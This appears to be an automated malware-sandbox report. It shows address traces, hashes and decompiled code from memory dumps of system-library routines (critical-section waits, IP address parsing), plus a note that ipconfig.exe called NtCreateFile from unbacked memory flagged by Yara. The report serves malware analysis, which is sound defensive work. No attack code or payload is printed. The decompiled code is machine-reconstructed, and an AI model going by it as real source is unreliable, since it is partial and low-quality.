                                                                                        0x00ad228a
                                                                                        0x00ad228d
                                                                                        0x00ad228f
                                                                                        0x00ad22bc
                                                                                        0x00ad22bc
                                                                                        0x00ad22bc
                                                                                        0x00ad22be
                                                                                        0x00ad22c4
                                                                                        0x00ad22cc
                                                                                        0x00ad22d0
                                                                                        0x00ad22d6
                                                                                        0x00ad22d7
                                                                                        0x00ad22da
                                                                                        0x00ad22df
                                                                                        0x00ad22e4
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ad22e6
                                                                                        0x00ad22e9
                                                                                        0x00ad22f4
                                                                                        0x00ad22f9
                                                                                        0x00ad22fa
                                                                                        0x00ad2305
                                                                                        0x00ad2314
                                                                                        0x00ad2319
                                                                                        0x00ad231a
                                                                                        0x00ad231d
                                                                                        0x00ad2320
                                                                                        0x00ad2323
                                                                                        0x00ad2323
                                                                                        0x00ad2328
                                                                                        0x00ad232d
                                                                                        0x00ad232f
                                                                                        0x00ad2331
                                                                                        0x00ad2336
                                                                                        0x00ad2336
                                                                                        0x00ad233b
                                                                                        0x00ad233d
                                                                                        0x00ad2350
                                                                                        0x00ad2351
                                                                                        0x00ad2356
                                                                                        0x00ad2359
                                                                                        0x00ad2359
                                                                                        0x00ad235b
                                                                                        0x00ad235d
                                                                                        0x00a95367
                                                                                        0x00a9536b
                                                                                        0x00a95372
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ad2363
                                                                                        0x00ad2363
                                                                                        0x00ad2369
                                                                                        0x00ad236a
                                                                                        0x00ad236c
                                                                                        0x00ad2371
                                                                                        0x00ad2373
                                                                                        0x00000000
                                                                                        0x00ad2379
                                                                                        0x00ad2379
                                                                                        0x00ad237a
                                                                                        0x00ad237f
                                                                                        0x00ad237f
                                                                                        0x00ad2385
                                                                                        0x00ad2386
                                                                                        0x00ad2389
                                                                                        0x00ad238e
                                                                                        0x00ad2390
                                                                                        0x00a95378
                                                                                        0x00a9537c
                                                                                        0x00ad2396
                                                                                        0x00ad2396
                                                                                        0x00ad2397
                                                                                        0x00ad239c
                                                                                        0x00ad23a2
                                                                                        0x00ad23a3
                                                                                        0x00ad23a6
                                                                                        0x00ad23ab
                                                                                        0x00ad23ad
                                                                                        0x00000000
                                                                                        0x00ad23b3
                                                                                        0x00ad23b3
                                                                                        0x00ad23b4
                                                                                        0x00ad23b9
                                                                                        0x00ad23ba
                                                                                        0x00ad23ba
                                                                                        0x00ad23bc
                                                                                        0x00ad23bf
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ac9153
                                                                                        0x00ac9158
                                                                                        0x00ac915a
                                                                                        0x00ac915e
                                                                                        0x00ac9160
                                                                                        0x00000000
                                                                                        0x00ac9166
                                                                                        0x00ac9166
                                                                                        0x00ac9171
                                                                                        0x00ac9176
                                                                                        0x00ac9176
                                                                                        0x00000000
                                                                                        0x00ac9160
                                                                                        0x00ad23c6
                                                                                        0x00ad23cb
                                                                                        0x00ad23d7
                                                                                        0x00ad23d7
                                                                                        0x00ad23ad
                                                                                        0x00ad2390
                                                                                        0x00ad2373
                                                                                        0x00ad233f
                                                                                        0x00ad233f
                                                                                        0x00000000
                                                                                        0x00ad233f
                                                                                        0x00ad2291
                                                                                        0x00ad2291
                                                                                        0x00ad2293
                                                                                        0x00ad2295
                                                                                        0x00ad229a
                                                                                        0x00ad22a1
                                                                                        0x00ad22a3
                                                                                        0x00ad22a7
                                                                                        0x00ad22a9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ad22ab
                                                                                        0x00ad22ad
                                                                                        0x00ad22af
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ad22af
                                                                                        0x00ad22b1
                                                                                        0x00ad22b4
                                                                                        0x00ad22b4
                                                                                        0x00ad22b6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ad22b6
                                                                                        0x00ad228f
                                                                                        0x00000000
                                                                                        0x00ad226d
                                                                                        0x00a953cb
                                                                                        0x00a953ce
                                                                                        0x00a953d0
                                                                                        0x00a953d4
                                                                                        0x00a953d6
                                                                                        0x00000000
                                                                                        0x00a953d8
                                                                                        0x00a953e3
                                                                                        0x00a953ea
                                                                                        0x00a953ea
                                                                                        0x00a953d6
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AD22F4
                                                                                        Strings
                                                                                        • RTL: Re-Waiting, xrefs: 00AD2328
                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00AD22FC
                                                                                        • RTL: Resource at %p, xrefs: 00AD230B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                        • API String ID: 885266447-871070163
                                                                                        • Opcode ID: 5189a99850aa26316d77cb03b2657120cf866b34c0005c551db56666a78de101
                                                                                        • Instruction ID: cd9ccc99a3cf90f74e2ff6bb3b61c0381724d4bc931ada5cbeb2ee8193e732a4
                                                                                        • Opcode Fuzzy Hash: 5189a99850aa26316d77cb03b2657120cf866b34c0005c551db56666a78de101
                                                                                        • Instruction Fuzzy Hash: 9051D4727006056BDF119B38DD92FA773E8AF58360F11462AF919DF282EA61E941C7A0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00A9EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 51%
                                                                                        			E00A9EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E00A8DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0xb5793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E00A716C0(_t39);
				} else {
					_t40 = E00A6F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E00AB3915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E00A701A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0xb5793c; // 0x0
								_push(_t85);
								_t44 = E00A71F28(_t71);
							} else {
								_t44 = E00A6F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E00AB3915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E00AF2306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E00A9EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E00AB4FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E00AC3F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E00AC3F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0xb520c0;
								if(_t85 != 0xb520c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E00AF217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E00AC3F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                                                                        0x00a9ec56
                                                                                        0x00a9ec56
                                                                                        0x00a9ec56
                                                                                        0x00a9ec5c
                                                                                        0x00a9ec64
                                                                                        0x00ad23e6
                                                                                        0x00ad23eb
                                                                                        0x00ad23eb
                                                                                        0x00a9ec6a
                                                                                        0x00a9ec6c
                                                                                        0x00a9ec6f
                                                                                        0x00ad23f3
                                                                                        0x00ad23f8
                                                                                        0x00ad23fa
                                                                                        0x00ad23fc
                                                                                        0x00a9ec75
                                                                                        0x00a9ec76
                                                                                        0x00a9ec76
                                                                                        0x00a9ec7b
                                                                                        0x00a9ec7c
                                                                                        0x00a9ec7e
                                                                                        0x00ad2406
                                                                                        0x00ad2407
                                                                                        0x00ad240c
                                                                                        0x00ad240d
                                                                                        0x00ad240d
                                                                                        0x00ad240d
                                                                                        0x00ad2414
                                                                                        0x00ad2417
                                                                                        0x00ad241e
                                                                                        0x00ad2435
                                                                                        0x00ad2438
                                                                                        0x00ad243c
                                                                                        0x00ad243f
                                                                                        0x00ad2442
                                                                                        0x00ad2443
                                                                                        0x00ad2446
                                                                                        0x00ad2449
                                                                                        0x00ad2453
                                                                                        0x00ad2455
                                                                                        0x00ad245b
                                                                                        0x00ad245b
                                                                                        0x00a9eb99
                                                                                        0x00a9eb99
                                                                                        0x00a9eb9c
                                                                                        0x00a9eb9d
                                                                                        0x00a9eb9f
                                                                                        0x00a9eba2
                                                                                        0x00ad2465
                                                                                        0x00ad246b
                                                                                        0x00ad246d
                                                                                        0x00a9eba8
                                                                                        0x00a9eba9
                                                                                        0x00a9eba9
                                                                                        0x00a9ebae
                                                                                        0x00a9ebb3
                                                                                        0x00a9ebb9
                                                                                        0x00a9ebbb
                                                                                        0x00ad2513
                                                                                        0x00ad2514
                                                                                        0x00ad2519
                                                                                        0x00ad251b
                                                                                        0x00a9ec2a
                                                                                        0x00a9ec2d
                                                                                        0x00a9ec33
                                                                                        0x00a9ec36
                                                                                        0x00a9ec3a
                                                                                        0x00a9ec3e
                                                                                        0x00a9ec40
                                                                                        0x00a9ec47
                                                                                        0x00a9ec47
                                                                                        0x00a9ec40
                                                                                        0x00a722c6
                                                                                        0x00a9ebc1
                                                                                        0x00a9ebc1
                                                                                        0x00a9ebc5
                                                                                        0x00a9ec9a
                                                                                        0x00a9ec9a
                                                                                        0x00a9ebd6
                                                                                        0x00a9ebd6
                                                                                        0x00000000
                                                                                        0x00a9ebbb
                                                                                        0x00ad2477
                                                                                        0x00ad247c
                                                                                        0x00ad2486
                                                                                        0x00ad248b
                                                                                        0x00ad2496
                                                                                        0x00ad249b
                                                                                        0x00ad249d
                                                                                        0x00ad24a0
                                                                                        0x00ad24a3
                                                                                        0x00ad24aa
                                                                                        0x00ad24aa
                                                                                        0x00ad24a5
                                                                                        0x00ad24a5
                                                                                        0x00ad24a5
                                                                                        0x00ad24ac
                                                                                        0x00ad24af
                                                                                        0x00ad24b0
                                                                                        0x00ad24b3
                                                                                        0x00ad24b9
                                                                                        0x00ad24ba
                                                                                        0x00ad24bb
                                                                                        0x00ad24c6
                                                                                        0x00ad24cb
                                                                                        0x00ad24cd
                                                                                        0x00ad24d0
                                                                                        0x00ad24d1
                                                                                        0x00ad24d4
                                                                                        0x00ad24d6
                                                                                        0x00ad24d9
                                                                                        0x00ad24d9
                                                                                        0x00ad24dc
                                                                                        0x00ad24df
                                                                                        0x00ad24e1
                                                                                        0x00ad24e7
                                                                                        0x00ad24e9
                                                                                        0x00ad24ec
                                                                                        0x00ad24ef
                                                                                        0x00ad24f2
                                                                                        0x00ad24f2
                                                                                        0x00ad24ef
                                                                                        0x00ad24e7
                                                                                        0x00ad24fa
                                                                                        0x00ad24ff
                                                                                        0x00ad2501
                                                                                        0x00ad2503
                                                                                        0x00ad2506
                                                                                        0x00ad250b
                                                                                        0x00a9eb8c
                                                                                        0x00a9eb93
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00a9eb93
                                                                                        0x00000000
                                                                                        0x00a9eb99
                                                                                        0x00a9ec85
                                                                                        0x00a9ec85
                                                                                        0x00a9ec85
                                                                                        0x00000000

                                                                                        Strings
                                                                                        • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00AD248D
                                                                                        • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00AD24BD
                                                                                        • RTL: Re-Waiting, xrefs: 00AD24FA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                        • API String ID: 0-3177188983
                                                                                        • Opcode ID: 3c6ade50251908d3014041db18730d57c095e05cdf33aab23ede356199a58e88
                                                                                        • Instruction ID: f11e6a1eaff6db1fe2eea082ce974e9f3744e7dcae54dc36853e7edae2e0f247
                                                                                        • Opcode Fuzzy Hash: 3c6ade50251908d3014041db18730d57c095e05cdf33aab23ede356199a58e88
                                                                                        • Instruction Fuzzy Hash: 2341C5B1600204ABCB20DB68DD85FAA77F8AF44720F20C656F95A9B3C2D774E941C7A0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AAFCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00AAFCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E00AAEE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E00AAEE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E00AA685D(_t167, 4) == 0) {
								if(E00AA685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E00AA685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E00AA685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E00A88980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E00A7DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E00AAEE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E00AAEE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                                                                        0x00aafcd1
                                                                                        0x00aafcd6
                                                                                        0x00aafcd9
                                                                                        0x00aafcdc
                                                                                        0x00aafcdf
                                                                                        0x00aafce2
                                                                                        0x00aafce5
                                                                                        0x00aafce8
                                                                                        0x00aafceb
                                                                                        0x00aafced
                                                                                        0x00aafced
                                                                                        0x00aafcf3
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00aafcfc
                                                                                        0x00aafcfe
                                                                                        0x00aafdc1
                                                                                        0x00adecbd
                                                                                        0x00000000
                                                                                        0x00adeccc
                                                                                        0x00adeccc
                                                                                        0x00adecd2
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00adecdf
                                                                                        0x00adece0
                                                                                        0x00adece4
                                                                                        0x00adeceb
                                                                                        0x00adecee
                                                                                        0x00adeca8
                                                                                        0x00adeca8
                                                                                        0x00adecaa
                                                                                        0x00aafd76
                                                                                        0x00aafd79
                                                                                        0x00aafdb4
                                                                                        0x00aafdb5
                                                                                        0x00aafdb6
                                                                                        0x00000000
                                                                                        0x00aafdb6
                                                                                        0x00aafd7e
                                                                                        0x00adecfc
                                                                                        0x00aafe2f
                                                                                        0x00000000
                                                                                        0x00aafe2f
                                                                                        0x00aded08
                                                                                        0x00aded0f
                                                                                        0x00aded17
                                                                                        0x00aded1b
                                                                                        0x00000000
                                                                                        0x00aded1b
                                                                                        0x00aafd88
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00aafd94
                                                                                        0x00aafd99
                                                                                        0x00aafda1
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00aafdb0
                                                                                        0x00000000
                                                                                        0x00aafdb0
                                                                                        0x00adecbd
                                                                                        0x00aafdc7
                                                                                        0x00aafdcb
                                                                                        0x00000000
                                                                                        0x00aafdd7
                                                                                        0x00aafde3
                                                                                        0x00aafe06
                                                                                        0x00ac1fe7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ac1fef
                                                                                        0x00ac1ff0
                                                                                        0x00ac1ff4
                                                                                        0x00ac1ff7
                                                                                        0x00ac1ffa
                                                                                        0x00ac1ffd
                                                                                        0x00ac2000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00adecf1
                                                                                        0x00000000
                                                                                        0x00adecf1
                                                                                        0x00000000
                                                                                        0x00aafe06
                                                                                        0x00aafde8
                                                                                        0x00aafdec
                                                                                        0x00aafdef
                                                                                        0x00aafdf2
                                                                                        0x00000000
                                                                                        0x00aafdf2
                                                                                        0x00aafdcb
                                                                                        0x00aafd04
                                                                                        0x00aafd05
                                                                                        0x00adec67
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00adec6f
                                                                                        0x00000000
                                                                                        0x00adec6f
                                                                                        0x00aafd13
                                                                                        0x00aafd3c
                                                                                        0x00aafd40
                                                                                        0x00adec75
                                                                                        0x00adec7a
                                                                                        0x00000000
                                                                                        0x00adec8a
                                                                                        0x00adec8a
                                                                                        0x00adec90
                                                                                        0x00adecb2
                                                                                        0x00aafd73
                                                                                        0x00aafd73
                                                                                        0x00000000
                                                                                        0x00aafd73
                                                                                        0x00adec95
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00adeca1
                                                                                        0x00adeca4
                                                                                        0x00adeca5
                                                                                        0x00000000
                                                                                        0x00adeca5
                                                                                        0x00adec7a
                                                                                        0x00aafd4a
                                                                                        0x00000000
                                                                                        0x00aafd6e
                                                                                        0x00aafd6e
                                                                                        0x00aafd71
                                                                                        0x00000000
                                                                                        0x00aafd71
                                                                                        0x00aafd4a
                                                                                        0x00aafd21
                                                                                        0x00aba3a1
                                                                                        0x00000000
                                                                                        0x00aba3a1
                                                                                        0x00aafd36
                                                                                        0x00ac200b
                                                                                        0x00ac2012
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ac2018
                                                                                        0x00000000
                                                                                        0x00ac2018
                                                                                        0x00000000
                                                                                        0x00aafd36
                                                                                        0x00aafe0f
                                                                                        0x00aafe16
                                                                                        0x00aba3ad
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00aba3b3
                                                                                        0x00aba3b3
                                                                                        0x00aafe1f
                                                                                        0x00aded25
                                                                                        0x00aded86
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00aded91
                                                                                        0x00aded95
                                                                                        0x00aded95
                                                                                        0x00aded9a
                                                                                        0x00adedad
                                                                                        0x00adedb3
                                                                                        0x00adedba
                                                                                        0x00adedc4
                                                                                        0x00adedc9
                                                                                        0x00000000
                                                                                        0x00adedcc
                                                                                        0x00aded2a
                                                                                        0x00aded55
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00aded61
                                                                                        0x00aded66
                                                                                        0x00aded6e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00aded7d
                                                                                        0x00000000
                                                                                        0x00aded7d
                                                                                        0x00aded30
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00aded3c
                                                                                        0x00aded43
                                                                                        0x00aded4b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: __fassign
                                                                                        • String ID:
                                                                                        • API String ID: 3965848254-0
                                                                                        • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                        • Instruction ID: 6a50e41646b47c1980c265edfacf295a30a039e2d4310635294674c490e1da3c
                                                                                        • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                        • Instruction Fuzzy Hash: CD916D71E0024AEFDF28DF98C8456AEB7B4EF56314F24807AD451AB2A2E7305A41CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Analysis Process: ipconfig.exe PID: 1012 Parent PID: 2636 ipconfig.exeCOMMON

                                                                                        Executed Functions

                                                                                        Function 000D81C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,000D3B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000D3B97,007A002E,00000000,00000060,00000000,00000000), ref: 000D820D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID: .z`
